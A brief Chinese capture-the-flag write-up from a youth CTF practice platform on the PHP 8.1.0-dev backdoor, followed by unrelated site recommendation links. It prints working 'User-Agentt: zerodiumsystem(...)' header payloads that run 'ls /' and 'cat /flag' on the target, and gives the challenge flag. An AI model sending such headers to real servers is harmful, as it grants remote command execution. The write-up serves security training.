青少年CTF练习平台 PHP的后门

马船长2025-01-25 0:35

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码 
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码 
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
dhxhsgrx30 分钟前
PYTHON训练营DAY25
java·开发语言·python
风逸hhh3 小时前
python打卡day25@浙大疏锦行
开发语言·python
刚入门的大一新生3 小时前
C++初阶-string类的模拟实现与改进
开发语言·c++
chxii4 小时前
5java集合框架
java·开发语言
老衲有点帅5 小时前
C#多线程Thread
开发语言·c#
C++ 老炮儿的技术栈5 小时前
什么是函数重载?为什么 C 不支持函数重载,而 C++能支持函数重载?
c语言·开发语言·c++·qt·算法
IsPrisoner5 小时前
Go语言安装proto并且使用gRPC服务(2025最新WINDOWS系统)
开发语言·后端·golang
Python私教5 小时前
征服Rust:从零到独立开发的实战进阶
服务器·开发语言·rust
chicpopoo5 小时前
Python打卡DAY25
开发语言·python
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05Coze扣子平台完整体验和实践(附国内和国际版对比)06DeepSeek各版本说明与优缺点分析07组基轨迹建模 GBTM的介绍与实现(Stata 或 R)08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09苍穹外卖面试总结10【解决】Android Gradle Sync 报错 Could not read workspace metadata